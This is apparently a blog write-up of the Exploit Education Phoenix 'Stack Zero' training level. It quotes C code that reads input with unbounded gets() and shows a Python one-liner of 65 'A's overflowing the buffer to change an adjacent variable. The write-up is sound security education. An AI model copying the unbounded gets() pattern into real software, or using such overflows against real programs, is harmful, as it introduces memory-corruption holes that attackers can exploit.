Exploit Education | Phoenix | Stack Zero Solution

Stack Zero

The description and source code can be found here:
https://exploit.education/phoenix/stack-zero/

All binaries for the levels can be found in the /opt/phoenix/amd64/ directory. Looking at the source code on the site, it looks like we need to change the “changeme” variable. The “locals” struct is defined at the beginning of main():

struct {
  char buffer[64];
  volatile int changeme;
} locals;

Because of how local variables are stored on the stack, the “changeme” variable can potentially be overwritten if too many bytes are stored in the “buffer” variable. We can see that “changeme” is initialized to 0 and the gets() function is used to prompt the user to fill in the “buffer” variable:

locals.changeme = 0;
gets(locals.buffer);

Since gets() does not have any bounds checking, it should be possible to create a “buffer overflow” condition here. Let’s insert 65 A’s. First, I’ll use Python to generate the string. Then, I’ll copy-paste that into the program’s prompt for input:

user@phoenix-amd64:/opt/phoenix/amd64$ python -c 'print "A"*65'
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

user@phoenix-amd64:/opt/phoenix/amd64$ ./stack-zero
Welcome to phoenix/stack-zero, brought to you by https://exploit.education
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Well done, the 'changeme' variable has been changed!

Optionally, we could do this in one command:

user@phoenix-amd64:/opt/phoenix/amd64$ python -c 'print "A"*65' | ./stack-zero
Welcome to phoenix/stack-zero, brought to you by https://exploit.education
Well done, the 'changeme' variable has been changed!

Leave a Reply

Your email address will not be published.

This site uses Akismet to reduce spam. Learn how your comment data is processed.